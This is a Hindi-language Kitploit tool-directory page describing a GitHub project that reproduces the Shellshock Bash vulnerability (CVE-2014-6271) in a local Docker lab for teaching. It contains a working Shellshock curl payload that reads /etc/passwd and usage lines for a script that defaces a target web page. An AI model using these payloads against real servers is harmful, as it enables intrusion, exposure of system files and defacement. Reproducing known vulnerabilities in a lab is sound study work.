Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271 — CVE (ShellShock) की प्रस्तुति परियोजना, पीडीएफ, तकनीकी प्रदर्शन और पुनरुत्पादनीयता के साथ। | Kitploit
उपकरण/GitHubGitHub/radyio/cve-2014-6271
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubradyio/cve-2014-6271

CVE-2014-6271

CVE (ShellShock) की प्रस्तुति परियोजना, पीडीएफ, तकनीकी प्रदर्शन और पुनरुत्पादनीयता के साथ।

रिपॉजिटरी देखें
141 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2014-6271

विवरण

यह प्रोजेक्ट CVE-2014-6271 नामक कमजोरी को पुन: उत्पन्न करने की अनुमति देता है, जिसे Shellshock के नाम से भी जाना जाता है। Shellshock Bash में एक सुरक्षा कमजोरी है जो पर्यावरण चरों के माध्यम से दुर्भावनापूर्ण कोड निष्पादित करने की अनुमति देती है।

इस प्रोजेक्ट का उद्देश्य Docker वातावरण पर इस कमजोरी के प्रभाव को प्रदर्शित करना है।

आवश्यक शर्तें

शुरू करने से पहले, सुनिश्चित करें कि आपकी मशीन पर Docker स्थापित है। आप Docker यहाँ से डाउनलोड कर सकते हैं।

स्थापना और प्रारंभ

1. Docker इमेज बनाएँ

प्रोजेक्ट निर्देशिका में, निम्नलिखित कमांड चलाकर Docker इमेज बनाएँ:

docker build -t ['image name'] .

['image name'] को उस नाम से बदलें जो आप Docker इमेज को देना चाहते हैं।

2. Docker कंटेनर चलाएँ

इमेज बन जाने के बाद, निम्नलिखित कमांड से इस इमेज से एक कंटेनर चलाएँ:

docker run -it --rm -p 8080:80 ['image name']

यह आपकी स्थानीय मशीन के पोर्ट 8080 पर सेवा को उजागर करेगा।

3. एप्लिकेशन तक पहुँचें

अपना ब्राउज़र खोलें और http://localhost:8080 पर पहुँचें। आप एप्लिकेशन के व्यवहार का निरीक्षण कर सकेंगे और कमजोरी का परीक्षण कर सकेंगे।

4-1. कमजोरी का शोषण करें

दूसरे टर्मिनल में, कमजोरी का शोषण करने और /etc/passwd फ़ाइल की सामग्री पढ़ने के लिए निम्नलिखित कमांड चलाएँ:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

यह कमांड Shellshock का शोषण करने के लिए विशेष रूप से डिज़ाइन किया गया user-agent हेडर भेजता है। यदि कमजोरी सही ढंग से पुन: उत्पन्न होती है, तो /etc/passwd की सामग्री टर्मिनल आउटपुट में प्रदर्शित होगी।

4-2. कमजोरी का शोषण (स्क्रिप्ट exp_deface.sh)

यह स्क्रिप्ट कमजोरी का शोषण करके किसी लक्षित वेब पेज को विकृत (deface) करने की अनुमति देता है। यह कमजोरी CGI स्क्रिप्ट्स के गलत कॉन्फ़िगरेशन पर आधारित है, जो सर्वर पर मनमाने कमांड्स के निष्पादन की अनुमति देता है।

आवश्यक शर्तें:

  • सुनिश्चित करें कि लक्ष्य ShellShock बग के लिए कमजोर है।
  • सुनिश्चित करें कि आपके पास इस लक्ष्य पर एक्सप्लॉइट का परीक्षण करने के लिए आवश्यक अनुमतियाँ हैं।
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

सुरक्षा

महत्वपूर्ण: इस कमजोरी का उपयोग केवल नियंत्रित वातावरण में परीक्षण और प्रदर्शन उद्देश्यों के लिए किया जाना चाहिए। इस प्रोजेक्ट का उपयोग उत्पादन वातावरण में न करें।

टूल डाउनलोड करें